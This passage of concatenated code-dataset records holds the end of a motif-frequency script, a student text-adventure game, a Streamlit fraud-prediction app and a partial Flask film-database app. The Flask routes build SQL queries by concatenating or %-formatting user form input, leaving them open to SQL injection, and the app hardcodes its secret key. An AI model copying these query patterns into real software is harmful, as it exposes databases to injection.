len(sortedMerFrequencies)\n if bugNumber == 0:\n sortedMotifList0= []\n sortedFrequencyList0= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList0.append(merFrequencyTuple[0])\n sortedFrequencyList0.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList0:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement\n \n proportionsList0= []\n for aFrequency in sortedFrequencyList0:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList0.append(proportion)\n \n print(\"Done with bug 1\")\n \n if bugNumber == 1:\n sortedMotifList1= []\n sortedFrequencyList1= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList1.append(merFrequencyTuple[0])\n sortedFrequencyList1.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList1:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement 
\n \n proportionsList1= []\n for aFrequency in sortedFrequencyList1:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList1.append(proportion) \n \n print(\"Done with bug 2\")\n \n if bugNumber == 2:\n sortedMotifList2= []\n sortedFrequencyList2= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList2.append(merFrequencyTuple[0])\n sortedFrequencyList2.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList2:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList2= []\n for aFrequency in sortedFrequencyList2:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList2.append(proportion)\n\n print(\"Done with bug 3\")\n \n if bugNumber == 3:\n sortedMotifList3= []\n sortedFrequencyList3= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList3.append(merFrequencyTuple[0])\n sortedFrequencyList3.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList3:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList3= []\n for aFrequency in sortedFrequencyList3:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList3.append(proportion)\n \n print(\"Done with bug 4\")\n \n if bugNumber == 4:\n sortedMotifList4= []\n sortedFrequencyList4= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList4.append(merFrequencyTuple[0])\n sortedFrequencyList4.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList4:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n \n proportionsList4= []\n for aFrequency in sortedFrequencyList4:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList4.append(proportion)\n \n print(\"Done with bug 5\")\n \n if bugNumber == 5:\n sortedMotifList5= []\n sortedFrequencyList5= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList5.append(merFrequencyTuple[0])\n sortedFrequencyList5.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList5:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList5= []\n for aFrequency in sortedFrequencyList5:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList5.append(proportion)\n \n print(\"Done with bug 5\")\n \n if bugNumber == 6:\n sortedMotifList6= []\n sortedFrequencyList6= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList6.append(merFrequencyTuple[0])\n sortedFrequencyList6.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList6:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList6= []\n for aFrequency in sortedFrequencyList6:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList6.append(proportion) \n \n bugNumber= bugNumber+1\n \n EXCEL = open(\"Vectors2.csv\", 'w')\n \n # print column headings\n EXCEL.write(\"Word\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug1\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug2\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug3\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug4\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug5\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug6\") \n EXCEL.write(\",\")\n EXCEL.write(\"Bug7\") \n EXCEL.write(\"\\n\") \n\n for i in range(0,256):\n EXCEL.write(str(sortedMotifList1[i]))\n EXCEL.write(',')\n if i < 
len(proportionsList0):\n EXCEL.write(str(proportionsList0[i])) \n EXCEL.write(',')\n if i < len(proportionsList1):\n EXCEL.write(str(proportionsList1[i]))\n EXCEL.write(',')\n if i < len(proportionsList2):\n EXCEL.write(str(proportionsList2[i]))\n EXCEL.write(',')\n if i < len(proportionsList3):\n EXCEL.write(str(proportionsList3[i]))\n EXCEL.write(',')\n if i < len(proportionsList4):\n EXCEL.write(str(proportionsList4[i]))\n EXCEL.write(',')\n if i < len(proportionsList5):\n EXCEL.write(str(proportionsList5[i]))\n EXCEL.write(',')\n if i < len(proportionsList6):\n EXCEL.write(str(proportionsList6[i])) \n EXCEL.write('\\n')\n \n \n EXCEL.close()\n \n \n \n \n \n \n \n \nmain()","sub_path":"portfolio/work02/Gillis_A6.1.py","file_name":"Gillis_A6.1.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"200157457","text":"####################\n# CST-205 #\n# Module 5 Lab 12 #\n# Sevren Gail #\n# Chris Rendall #\n####################\n\nfrom random import randint\n\nclass Object: #These are objects found around the mansion.\n def __init__(self, name, description, permanence): #This constructor estabishes the name, description and permanence.\n self.name = name #This is the name of the object.\n self.description = description #This is the name of the object.\n self.permanence = permanence #This is the permanence of the object (whether an object can be removed from the room).\n self.uses = {} #This is a dictionary with a use (cause) as the key and the fallout (effect) as the value.\n \n def setName(self, name): #This is the mutator for the name.\n self.name = name\n \n def printName(self): #This prints the name.\n printNow(self.name)\n \n def getName(self): #This is the accessor for the name.\n return self.name\n \n def setDescription(self, description): #This is the mutator for the description.\n self.description = description\n \n def printDescription(self): #This prints the description.\n printNow(self.description)\n \n def getDescription(self): #This is the accessor for the description.\n return self.description\n \n def setPermanence(self, permanence): #This is the mutator for the permanence.\n self.permanence = permanence\n \n def getPermanence(self): #This is the accessor for the permanence.\n return self.permanence\n \n def setUse(self, use, fallout): #This is the mutator for the uses. 
It adds a key if one doesn't exist and sets the value.\n self.uses[use] = fallout\n\n def removeUse(self, use): #This lets you remove a use from an item.\n del self.uses[use]\n \n def getUses(self): #This is the accessor for the list of uses.\n return self.uses.keys()\n \n def getFallout(self, use): #This is the accessor for a specific use.\n return uses[use]\n\nclass Room: #These are rooms around the mansion.\n def __init__(self, name, description): #This constructor estabishes the name and description.\n self.name = name #This is the name of the room.\n self.description = description #This is the description of the room.\n self.directions = {} #This dictionary contains the directions you can go and the Rooms they lead to.\n self.objects = [] #These are the objects in the room.\n \n def setName(self, name): #This is the mutator for the name.\n self.name = name\n \n def printName(self): #This prints the name.\n printNow(self.name)\n \n def getName(self): #This is the accessor for the name.\n return self.name\n \n def setDescription(self, description): #This is the mutator for the description.\n self.description = description\n \n def printDescription(self): #This prints the description.\n printNow(self.description)\n \n def getDescription(self): #This is the accessor for the description.\n return self.description\n \n def getRoom(self, direction): #This returns the room that lies in the direction you want to go.\n return self.directions[direction]\n \n def setDirection(self, direction, room): #This creates a direction if one doesn't exist and sets the room there.\n self.directions[direction] = room\n \n def removeDirection(self, direction): #This removes a direction from the room.\n del self.directions[direction]\n \n def printDirections(self): #This prints the directions you can go.\n for direction in self.directions.keys():\n printNow(direction)\n\n def getDirections(self): #This returns the list of direction names.\n return self.directions.keys()\n \n def addObject(self, object): #This adds an object to the room.\n self.objects.append(object)\n \n def removeObject(self, object): #This removes an object from the room.\n if object in self.objects:\n self.objects.remove(object)\n \n def printObjects(self): #This prints the names of the objects in the room.\n for object in self.objects:\n object.printName()\n\n def getObjects(self): #This returns a list of objects in the room.\n return self.objects\n \n def fullyDescribe(self): #This prints a description that also includes the name, directions and objects\n printNow(\"------------\" + self.getName().upper() + \"------------\")\n self.printDescription()\n printNow(\"\")\n if len(self.objects) == 0:\n printNow(\"There are no objects in this room.\")\n else:\n printNow(\"Here are the objects in the room:\")\n self.printObjects()\n printNow(\"\")\n if len(self.directions) == 0:\n printNow(\"You can't see a way out. Bummer!\")\n else:\n printNow(\"Here are the directions you can go:\")\n self.printDirections()\n\ndef help(): #This prints the intro and directions.\n #The intro is the introductory statement that explains the premise of the game.\n intro = \"Your millionaire father has passed away. You have now realized that if you do not find his will, your \"\n intro += \"young stepmother will fabricate one and take everything. Right now your stepmother is working to acquire \"\n intro += \"an eviction notice to remove you from this house. You remember your father telling you that he hid it in \"\n intro += \"the library of his mansion. 
If you do not find the will soon, there is no hope.\"\n #These instructions tell how to play the game.\n instructions = \"You can move around the house by indicating a direction to move (ex: Move North). \"\n instructions += \"Feel free to abbreviate the commands (ex: Move n). \"\n instructions += \"You can also look at objects around the house (ex: Look At Table) and pick up some of them (ex: Pick Up Sandwich). \"\n instructions += \"Type inventory to see what you're holding. Try other commands too, like pull, push, open, use, etc... \"\n instructions += \"Type help at any time to see these directions again.\"\n printNow(intro)\n printNow(\"\")\n printNow(instructions)\n\ndef move(direction): #This moves the user to the room in the indicated direction if the direction is valid.\n global room\n validDirections = [\"north\", \"south\", \"east\", \"west\", \"up\", \"down\", \"n\", \"s\", \"e\", \"w\", \"u\", \"d\"]\n if direction == \"n\":\n direction = \"north\"\n if direction == \"s\":\n direction = \"south\"\n if direction == \"e\":\n direction = \"east\"\n if direction == \"w\":\n direction = \"west\"\n if direction == \"u\":\n direction = \"up\"\n if direction == \"d\":\n direction = \"down\"\n roomDirections = room.getDirections()\n for i in range(0, len(roomDirections)):\n roomDirections[i] = roomDirections[i].lower()\n if direction == \" \":\n printNow(\"Move where?\")\n elif validDirections.count(direction) == 0:\n printNow(\"That's not a direction...\")\n elif roomDirections.count(direction) == 0:\n printNow(\"You cannot move that direction in this room.\")\n else:\n room = room.getRoom(direction.capitalize())\n\ndef useCrowbar(): #This allows a user who has the crowbar in the library to move the bookshelf.\n global room\n global inventory\n global bookshelfMoved\n if room.getName() != \"Library\":\n printNow(\"You cannot use the crowbar here.\")\n else:\n for object in room.getObjects():\n if object.getName() == \"Bookshelf\":\n printNow(\"You use the crowbar to move the bookshelf, revealing a safe that was hidden behind it.\")\n printNow(\"The crowbar breaks just as the shelf moves aside.\")\n bookshelfMoved = true\n room.setDescription(getLibraryDescription())\n room.removeObject(object)\n room.addObject(Object(\"Safe\", \"A sturdy looking standard dial safe. The words, \\\"kitchen, bathroom, bedroom\\\" are scrawled on it.\", true))\n removeInventory(\"Crowbar\")\n \ndef removeInventory(item): #This removes object with name item from the inventory.\n global inventory\n for o in inventory:\n if o.getName() == item:\n inventory.remove(o)\n\ndef use(modifiers): #This calls useCrowbar when the user types use crowbar.\n global inventory\n if modifiers[0] == \"crowbar\":\n for object in inventory:\n if object.getName() == \"Crowbar\":\n useCrowbar()\n \ndef displayInventory(): #This prints the inventory objects.\n global inventory\n if len(inventory) == 0:\n printNow(\"You have nothing in you inventory. 
How sad...\")\n else:\n printNow(\"You have the following in your inventory:\")\n for object in inventory:\n printNow(object.getName())\n\ndef open(modifiers): #Open the safe if the user is in the library and the bookshelf is moved and the safe is closed.\n global kitchenNumber\n global bathroomNumber\n global bedroomNumber\n global room\n global bookshelfMoved\n global safeOpen\n safeFound = false\n if modifiers[0].lower() == \"safe\":\n for o in room.getObjects():\n if o.getName() == \"Safe\":\n safeFound = true\n if safeOpen:\n printNow(\"The safe is already open...\")\n else:\n number1 = requestInteger(\"Enter the first number of the combination:\")\n number2 = requestInteger(\"Enter the second number of the combination:\")\n number3 = requestInteger(\"Enter the third number of the combination:\")\n if number1 == kitchenNumber and number2 == bathroomNumber and number3 == bedroomNumber:\n printNow(\"As you open up the safe you see a big red button inside.\")\n room.setDescription(getLibraryDescription())\n room.addObject(Object(\"Button\", \"An invitingly bright red button.\", true))\n else:\n printNow(\"That... didn't work. Did you just make those numbers up?\")\n if not safeFound:\n printNow(\"There is no safe here...\")\n else:\n printNow(\"You cannot open that...\")\n\ndef push(modifiers): #Push the button if user is in the Library and the safe is open.\n global room\n global safeOpen\n global trapDoorOpen\n buttonFound = false\n if modifiers[0].lower() == \"button\":\n for o in room.getObjects():\n if o.getName() == \"Button\":\n buttonFound = true\n if trapDoorOpen:\n printNow(\"You press the button, but nothing happens.\")\n else:\n printNow(\"As you push the button, a cleverly hidden trap door pops open in the middle of the floor.\")\n trapDoorOpen = true\n room.setDescription(getLibraryDescription())\n basement = Room(\"Basement\", \"The basement is a small dark room with a writing table. 
On it lies your father's will.\")\n basement.setDirection(\"Up\", room)\n basement.addObject(Object(\"Father's Will\", \"\", false))\n room.setDirection(\"Down\", basement)\n if not buttonFound:\n printNow(\"There is no button here...\")\n else:\n printNow(\"Pushing that does nothing...\")\n\ndef performAction(action, modifiers): #This takes parsed actions and modifiers and performs the appropriate task.\n if len(modifiers) == 0:\n modifiers.append(\" \")\n moveActions = [\"move\", \"go\", \"travel\", \"walk\"]\n helpActions = [\"help\", \"?\"]\n directionActions = [\"north\", \"south\", \"east\", \"west\", \"up\", \"down\", \"n\", \"e\", \"s\", \"w\", \"u\", \"d\"]\n lookActions = [\"look\", \"l\", \"examine\", \"look\"]\n dropActions = [\"drop\"]\n pickupActions = [\"pickup\", \"get\"]\n inventoryActions = [\"inventory\", \"i\", \"inv\", \"equipment\", \"backpack\"]\n pullActions = [\"pull\"]\n useActions = [\"use\"]\n openActions = [\"open\"]\n pushActions = [\"push\", \"press\"]\n if moveActions.count(action.lower()) > 0:\n move(modifiers[0])\n elif directionActions.count(action.lower()) > 0:\n move(action)\n elif helpActions.count(action) > 0:\n help()\n elif lookActions.count(action) > 0:\n look(modifiers)\n elif useActions.count(action) > 0:\n use(modifiers)\n elif openActions.count(action) > 0:\n open(modifiers)\n elif pushActions.count(action) > 0:\n push(modifiers)\n elif pickupActions.count(action) > 0:\n pickup(modifiers)\n elif inventoryActions.count(action) > 0:\n displayInventory()\n elif pullActions.count(action) > 0:\n pull(modifiers)\n else: \n printNow(\"You can't do that...\")\n\ndef pull(modifiers): #Pull the latch if the user is in the library and the latch is unpulled.\n global latchPulled\n global room\n if modifiers[0] == \" \":\n printNow(\"Pull what?\")\n elif modifiers[0] == \"latch\" and room.getName() == \"Library\" and latchPulled == false:\n printNow(\"You pull the latch and a trap door opens leading upward and a ladder extends down to the floor.\")\n attic = Room(\"Attic\", \"A dark and dusty room with a small amount of light coming in through a window at the top of the room.\")\n attic.setDirection(\"Down\", room)\n attic.addObject(Object(\"Crowbar\", \"A rusty steel crowbar that's seen better days.\", false))\n room.setDirection(\"Up\", attic)\n for o in room.getObjects():\n if o.getName() == \"Latch\":\n room.removeObject(o)\n latchPulled = true\n room.setDescription(getLibraryDescription())\n else:\n printNow(\"There is no \" + modifiers[0] + \" here.\")\n \ndef look(modifiers): #Print the description of modifier if it exists.\n global room\n object = modifiers[0]\n objects = room.getObjects()\n objectFound = false\n for i in range(0, len(objects)):\n if objects[i].getName().lower() == object:\n printNow(objects[i].getDescription())\n objectFound = true\n if(not objectFound):\n printNow(\"There is no object by that name here...\")\n\ndef pickup(modifier): #Add the item to inventory and remove from room if it exists and is not permanent.\n global room\n global inventory\n objectFound = false\n for object in room.getObjects():\n if object.getName().lower() == modifier[0]:\n if object.getPermanence() == false:\n inventory.append(object)\n printNow(\"You pick up the \" + object.getName())\n objectFound = true\n room.removeObject(object)\n else:\n printNow(object.getName() + \" will not fit in your inventory...\")\n objectFound = true\n if not objectFound and modifier[0] != \" \":\n printNow(\"There is no \" + modifier[0] + \" here.\")\n elif not objectFound 
and modifier[0] == \" \":\n printNow(\"Pick up what?\")\n\ndef parseCommand(commandList): #This parses the command.\n verb = commandList[0]\n modifiers = commandList\n modifiers.pop(0)\n performAction(verb, modifiers)\n\ndef fixCommand(command): #This cleans up the command to make it easier to parse.\n command = command.replace(\"pick up\", \"pickup\")\n command = command.replace(\"look at\", \"look\")\n command = command.replace(\"the \", \"\")\n return command\n\ndef initializeRooms(): #This sets up the rooms initially.\n global kitchenNumber\n global bathroomNumber\n global bedroomNumber\n library = Room(\"Library\", getLibraryDescription())\n kitchen = Room(\"Kitchen\", \"You are in the kitchen. There is a large stainless steel refrigerator.\")\n bedroom = Room(\"Bedroom\", \"You are in your father's bedroom. There is a large bed in the corner.\")\n entryway = Room(\"Entryway\", \"You are in the entryway to your father's mansion. There is a large door to the south.\")\n bathroom = Room(\"Bathroom\", \"You are in the bathroom. There is a large bathtub. The toilet is spotless.\")\n outside = Room(\"Outside\", \"You are outside. Your stepmother is there with the eviction notice. She locks you outside. How cold!\")\n library.setDirection(\"West\", kitchen)\n library.setDirection(\"East\", bathroom)\n library.setDirection(\"North\", bedroom)\n library.setDirection(\"South\", entryway)\n library.addObject(Object(\"Table\", \"A table made of old oak covered in a film of dust.\", true))\n library.addObject(Object(\"Bookshelf\", \"A bookshelf that seems slightly offset.\", true))\n library.addObject(Object(\"Latch\", \"A latch extending down from the ceiling.\", true))\n kitchen.setDirection(\"East\", library)\n kitchen.addObject(Object(\"Refrigerator\", \"A large stainless steel refrigerator with fridge magnet showing the number \" + str(kitchenNumber), true))\n bedroom.setDirection(\"South\", library)\n bedroom.addObject(Object(\"Bed\", \"A large bed covered by a plush comforter carefully embroidered with the number \" + str(bedroomNumber), true))\n bathroom.setDirection(\"West\", library)\n bathroom.addObject(Object(\"Bathtub\", \"A sizeable bath tub with a state of the art faucet.\", true))\n bathroom.addObject(Object(\"Toilet\", \"A spotless toilet. While it looks clean, it clearly stinks like the number \" + str(bathroomNumber), true))\n entryway.setDirection(\"North\", library)\n entryway.setDirection(\"South\", outside)\n return library\n \ndef getLibraryDescription(): #This returns the current description of the library.\n global bookshelfMoved\n global latchPulled\n global trapDoorOpen\n description = \"You find yourself in a room surrounded by bookshelves.\"\n if bookshelfMoved:\n description += \" There is a large sturdy dial safe in the wall.\"\n else:\n description += \" There is a bookshelf that is slightly offset.\"\n if latchPulled:\n description += \" There is a ladder leading upward.\"\n else:\n description += \" In the ceiling there is a latch that looks just within reach.\"\n if trapDoorOpen:\n description += \" A trap door gapes invitingly in the center of the floor.\"\n return description\n\ndef playGame(): #This is the main loop.\n global room\n continuePlaying = true\n inventory = []\n while(continuePlaying):\n printNow(\"\")\n room.fullyDescribe()\n printNow(\"\")\n if room.getName() == \"Basement\":\n printNow(\"You have found your father's will! Congratulations!\")\n if randint(1,10) > 5:\n printNow(\"It says that you inherit everything! 
Score!\")\n else:\n printNow(\"It says... that your step mom inherits everything... Let's just forget we found this, eh?\")\n continuePlaying = false\n elif room.getName() == \"Outside\":\n printNow(\"You facepalm your shortsightedness in coming outside. Oh, well. You probably wouldn't appreciate that fortune anyways.\")\n continuePlaying = false\n else:\n try:\n command = requestString(\"Enter a command:\").lower()\n if(command != \"exit\"):\n command = fixCommand(command)\n parseCommand(command.split(' '))\n else:\n printNow(\"You gave up? I guess a multi-million dollar estate is overrated, right?\")\n continuePlaying = false\n except:\n printNow(\"You gave up? I guess a multi-million dollar estate is overrated, right?\")\n continuePlaying = false\n\nkitchenNumber = randint(1,99) #This is the number found in the kitchen.\nbathroomNumber = randint(1,99) #This is the number found in the bathroom.\nbedroomNumber = randint(1,99) #This is the number found in the bedroom.\nbookshelfMoved = false #This turns true when the user moves the bookshelf in the library.\nlatchPulled = false #This turns true when the user pulls the latch in the library.\ntrapDoorOpen = false #This turns true when the user opens the trap door in the library.\nsafeOpen = false #This turns true when the user opens the safe in the library.\nroom = initializeRooms() #This is the current room that the user is in.\ninventory = [] #This is a list containing the objects carried by the user.\nhelp()\nplayGame()","sub_path":"mod5lab12.py","file_name":"mod5lab12.py","file_ext":"py","file_size_in_byte":18787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"236328473","text":"import streamlit as st\nfrom pycaret.classification import *\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\n\nmodel = load_model('modelCB')\n\ndef predict(model, input_df):\n predictions_df = predict_model(estimator=model, data=input_df)\n predictions = predictions_df['Label'][0]\n return predictions\n\ndef run():\n\n from PIL import Image\n image = Image.open('fd.jpg')\n image_fd = Image.open('ifd.jpg')\n image_JA = Image.open('J&A.jpg')\n image_fraude = Image.open('Fraude.jpg')\n\n st.image(image_JA,use_column_width=False)\n\n add_selectbox = st.sidebar.selectbox(\n \"How would you like to predict?\",\n (\"Online\", \"Batch\"))\n\n st.sidebar.info('As part of our consulting offer in Fraud Detection, at J&A we help industrial companies, banks, insurances and other financial institutions define strategies depending on their size and future perspectives, in order to better adapt to their needs. 
This not only permits us to deliver the best solution for every client as it is today (current level of maturity in Fraud Detection), but also establishes a path for its evolution in Fraud Detection solutions through time.')\n st.sidebar.success('J&A')\n \n st.sidebar.image(image_fraude)\n\n st.title(\"Insurance fraud Prediction App by J&A\")\n\n if add_selectbox == 'Online':\n\n incident_severity=st.selectbox('incident_severity', [0,1,2,3])\n insured_hobbies=st.selectbox('insured_hobbies', ['reading', 'paintball', 'exercise', 'bungie-jumping', 'camping', 'movies', 'golf', 'kayaking', 'yachting', 'hiking', 'video-games', 'skydiving', 'base-jumping', 'board-games', 'polo', 'chess', 'dancing', 'sleeping', 'cross-fit', 'basketball'])\n capital_loss=st.number_input('capital_loss', min_value=0, max_value=115000, value=25)\n policy_annual_premium=st.number_input('policy_annual_premium', min_value=400, max_value=2100, value=1000)\n collision_type=st.selectbox('collision_type', ['Rear Collision','Side Collision','Front Collision','undocumented'])\n incident_state=st.selectbox('incident_state', ['NY','SC','WV','VA','NC','PA','OH'])\n loss_by_claims=st.number_input('loss_by_claims', min_value=-40000, max_value=110000, value=0)\n property_claim=st.number_input('property_claim', min_value=0, max_value=24000, value=0)\n \n\n output=\"\"\n\n input_dict = {'incident_severity' : incident_severity, 'insured_hobbies' : insured_hobbies, 'capital_loss' : capital_loss, 'policy_annual_premium' : policy_annual_premium, 'collision_type' : collision_type, 'incident_state' : incident_state, 'property_claim' : property_claim, 'loss_by_claims' : loss_by_claims}\n input_df = pd.DataFrame([input_dict])\n\n if st.button(\"Predict\"):\n output = predict(model=model, input_df=input_df)\n output = '(Fraud -> 1 or Not Fraud -> 0) The fraud prediction is :' + str(output)\n\n st.success('The output is {}'.format(output))\n\n if add_selectbox == 'Batch':\n\n file_upload = st.file_uploader(\"Upload csv file for predictions\", type=[\"csv\"])\n\n if file_upload is not None:\n data = pd.read_csv(file_upload)\n predictions = predict_model(estimator=model,data=data)\n st.write(predictions)\n\nif __name__ == '__main__':\n run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"441513634","text":"from flask import Flask, render_template, url_for, flash\nfrom flask import request\nfrom db_connector.db_connector import connect_to_database, execute_query\nimport logging\nimport string\n#create the web application\nwebapp = Flask(__name__)\nwebapp.secret_key = 'vxBQYZpvBn'\n\n@webapp.route('/')\ndef home():\n return render_template('index.html')\n\n@webapp.route('/films', methods=['POST','GET'])\n#the name of this function is just a cosmetic thing\ndef films():\n db_connection = connect_to_database()\n\n if request.method == 'POST' and request.form.get('deleteButton') == None:\n # Film being added\n title = request.form['title']\n language = request.form['language']\n year = request.form['year']\n runtime = request.form['runtime']\n insert_query = 'INSERT INTO film (title, language, year, runtime) VALUES (%s,%s,%s,%s)'\n data = (title, language, year, runtime)\n execute_query(db_connection, insert_query, data)\n flash('Film added!');\n elif request.method == 'POST':\n # Film being deleted\n deleteID = request.form['deleteButton']\n delete_query = \"DELETE FROM film WHERE id = \" + deleteID + \";\"\n 
execute_query(db_connection, delete_query);\n\n # Display films in DB\n query = \"SELECT id, title, language, year, runtime from film;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n return render_template('films.html', rows=result)\n\n@webapp.route('/genre', methods=['POST','GET'])\ndef genre():\n db_connection = connect_to_database()\n genre_selected = 1 # Default genre for showing films if not otherwise specified\n \n if request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Add relationship into the film_genre composite table\n film_selected = request.form.get('composite_film_select')\n genre_selected = request.form.get('composite_genre_select')\n composite_insert_query = 'INSERT INTO film_genres (genre_id, film_id) VALUES (%s,%s)'\n data = (genre_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('name') != None:\n # Add genre to genre table\n name = request.form['name']\n description = request.form['description']\n insert_query = 'INSERT INTO genre (name, description) VALUES (%s,%s)'\n data = (name, description)\n execute_query(db_connection, insert_query, data)\n elif request.method == 'POST':\n # If this is not an INSERT, just show the films in selected genre\n genre_selected = request.form.get('genre_select')\n\n # Genre dropdown\n query = \"SELECT id, name FROM genre;\"\n result = execute_query(db_connection, query).fetchall()\n print(result)\n\n # Film dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Show films in given genre\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_genres g ON f.id = g.film_id AND g.genre_id = %s\" % (genre_selected)\n result2 = execute_query(db_connection, query2).fetchall()\n return render_template('genre.html', genres=result, films=film_results, genre_id=genre_selected, rows=result2)\n\n@webapp.route('/awards', methods=['POST','GET'])\ndef awards():\n db_connection = connect_to_database()\n award_selected = 1\n\n if request.method == 'POST' and request.form.get('composite_film_select') != None:\n film_selected = request.form.get('composite_film_select')\n award_selected = request.form.get('composite_award_select')\n composite_insert_query = 'INSERT INTO film_awards (award_id, film_id) VALUES (%s,%s)'\n data = (award_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('title') != None:\n # Add award to award table\n title = request.form['title']\n year_issued = request.form['year_issued']\n insert_query = 'INSERT INTO award (title, year_issued) VALUES (%s,%s)'\n data = (title, year_issued)\n execute_query(db_connection, insert_query, data)\n elif request.method == 'POST':\n # If this is not an INSERT, just show the films with selected award\n award_selected = request.form.get('award_select')\n\t\t\n # Award dropdown\n query = \"SELECT id, title FROM award;\"\n result = execute_query(db_connection, query).fetchall()\n print(result)\n\n # Film dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Show films with given award\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_awards a ON f.id = a.film_id AND a.award_id = %s\" % (award_selected)\n 
result2 = execute_query(db_connection, query2).fetchall();\n return render_template('awards.html', awards=result, films=film_results, award_id=award_selected, rows=result2);\n\n@webapp.route('/actors', methods=['POST','GET'])\ndef actors():\n actor_selected = 1 # Default selected actor unless otherwise specified\n db_connection = connect_to_database()\n\n if request.method == 'POST' and request.form.get('actor_select') != None:\n # Filter or update query\n actor_selected = request.form.get('actor_select')\n elif request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Adding relationship to composite table film_direction\n film_selected = request.form.get('composite_film_select')\n actor_selected = request.form.get('composite_film_actor_select')\n composite_insert_query = 'INSERT INTO film_actors (actor_id, film_id) VALUES (%s,%s)'\n data = (actor_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('fname_insert') != None:\n # Adding new actor to actor table\n first_name = request.form['fname_insert']\n last_name = request.form['lname_insert']\n year_born = request.form['year_born_insert']\n year_died = request.form['year_died_insert']\n insert_query = 'INSERT INTO actor (first_name, last_name, year_born, year_died) VALUES (%s,%s,%s,%s)'\n data = (first_name, last_name, year_born, year_died)\n execute_query(db_connection, insert_query, data)\n\n # Populate Actor Dropdown\n query = \"SELECT id, last_name FROM actor;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n\n # Populate Film Dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Populate Films with Selected Director Table\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_actors fa ON f.id = fa.film_id AND fa.actor_id = %s\" % (actor_selected)\n result2 = execute_query(db_connection, query2).fetchall();\n return render_template('actors.html', actors=result, actor_id=actor_selected, films=film_results, rows=result2);\n\n@webapp.route('/directors', methods=['POST','GET'])\ndef directors():\n valid_update_query = False\n director_selected = 1 # Default selected director unless otherwise specified\n db_connection = connect_to_database()\n \n if request.method == 'POST' and request.form.get('director_select') != None:\n # Filter or update query\n director_selected = request.form.get('director_select');\n first_name = request.form['fname']\n last_name = request.form['lname']\n year_born = request.form['year_born']\n year_died = request.form['year_died']\n valid_update_query = True\n elif request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Adding relationship to composite table film_direction\n film_selected = request.form.get('composite_film_select')\n director_selected = request.form.get('composite_film_director_select')\n composite_insert_query = 'INSERT INTO film_direction (director_id, film_id) VALUES (%s,%s)'\n data = (director_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('fname_insert') != None:\n # Adding new director to director table\n first_name = request.form['fname_insert']\n last_name = request.form['lname_insert']\n year_born = request.form['year_born_insert']\n year_died = 
